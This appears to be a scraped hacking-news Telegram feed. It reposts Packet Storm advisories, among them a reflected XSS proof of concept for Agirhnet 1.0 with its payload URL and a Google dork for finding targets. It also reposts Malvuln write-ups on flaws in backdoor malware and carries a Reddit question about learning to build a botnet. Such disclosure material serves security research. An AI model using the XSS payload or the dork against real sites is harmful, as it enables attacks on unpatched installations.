Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Agent.baol Insecure Permissions

https://3.bp.blogspot.com/-Q0zmt52Iz_s/WWlvCi1SqRI/AAAAAAAAIKo/56GGQ_7zLBsvaLtYw9wmjI_Jb6z2oza2QCLcBGAs/s1600/h129.png
Backdoor.Win32.Agent.baol malware suffers from an insecure permissions vulnerability.

MD5 | 23906c88136df4e887e4feafbfd35ad9

Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/1f84a5305b65d7f6aa3afa7e2f2bda0e.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Agent.baol
Vulnerability: Insecure Permissions
Description: The malware writes several PE files with insecure permissions under c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Type: PE32
MD5: 1f84a5305b65d7f6aa3afa7e2f2bda0e
Vuln ID: MVID-2022-0495
Disclosure: 02/21/2022
Exploit/PoC:
C:\>cacls NB_Server.exe
C:\NB_Server.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
C:\>dir NB_Server.exe
Volume in drive C has no label.

Directory of C:\

02/11/2022 02:10 AM 70,411 NB_Server.exe
1 File(s) 70,411 bytes
0 Dir(s) 26,507,804,672 bytes free

C:\>cacls ds1.exe
C:\ds1.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C

C:\>dir ds1.exe
Volume in drive C has no label.

Directory of C:\

02/11/2022 02:10 AM 0 ds1.exe
1 File(s) 0 bytes
0 Dir(s) 26,506,407,936 bytes free
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Agirhnet 1.0 Cross Site Scripting

https://2.bp.blogspot.com/-trS7d3JOSJY/WWlvYoSx4fI/AAAAAAAAIOo/ua-jTrS9avcHrliD3JJHs9ifWyf14eAUwCLcBGAs/s1600/h57.png
Agirhnet version 1.0 suffers from a cross site scripting vulnerability.

MD5 | ef6c4205e2f5214c1f0d90bd7a8a0a2f

Download
# Exploit Title: [Agirhnet] - Reflected XSS via GET
# Google Dork: inurl:agirhnet
# Date: 2022-02-21
# Exploit Author: Daniel Martinez Adan (aDoN90)
# Vendor Homepage: https://agirh.net/
# Version: [app version] 1.0
# CVSS : 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

URL:
https://example.com/AgirhNet/LoadingProgress.aspx?FORM=/%22%0Aconfirm(document.domain)//

vulnerable Parameter : FORM
Payload: /%22%0Aconfirm(document.domain)//

it is compulsory to put the "/" at the beginning of the payload (it has to
recognize it as a URL)


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Dsocks.10 Hardcoded Password

https://1.bp.blogspot.com/-HfAgGXf1DOw/WWlvbMysVAI/AAAAAAAAIPI/FubFag34U7YDsw4ZG5KiakYQR-P9HSuiwCLcBGAs/s1600/h72.png
Backdoor.Win32.Dsocks.10 malware suffers from a hardcoded cleartext password vulnerability.

MD5 | 7146a3c64c1589283679178640135a9f

Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/3a505e7ea1beee556860488e34db8da6.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Dsocks.10
Vulnerability: Hardcoded Cleartext Password
Description: The malware Coded by Drocon builds and creates backdoor servers, the supplied password is then hardcoded in cleartext in the PE file.
Type: PE32
MD5: 3a505e7ea1beee556860488e34db8da6
Vuln ID: MVID-2022-0496
Dropped files: server.exe
Disclosure: 02/21/2022

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Hidden Costs of a Data Breach

Don't consider just the initial costs. Hidden factors include remediation, revenue loss, reputational harm, national security — even human life.
hacking: security in practice
Building a BOTNET windows driver manipulation

Hey guys, I'm kinda lost looking for an advice.

I'm second year student for CS, I gained interest in constructing a BOTNET, not for harmful proposes only for my own personal knowledge, and it seems like a complex and fun project to make.

I have bought the following book to gain basic knowledge of what I should be looking at: https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164

I started reading and realized I don't have enough basic knowledge in-order to understand that book. I was trying to figure out what I'm missing, I came across Kernel drivers programing using C/C++,

My question is if it is the missing piece? I have good knowledge of C, C++ and Assembly x86, but not yet knowledge of operating systems and windows especially.

I would love a recommendation for a book or topics I should be researching in-order to gain good comprehension of windows drivers manipulations.

submitted by /u/Pig443
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Paper HackTheBox Write-Up

Easy box made by JinContinue reading on Medium »
Read more...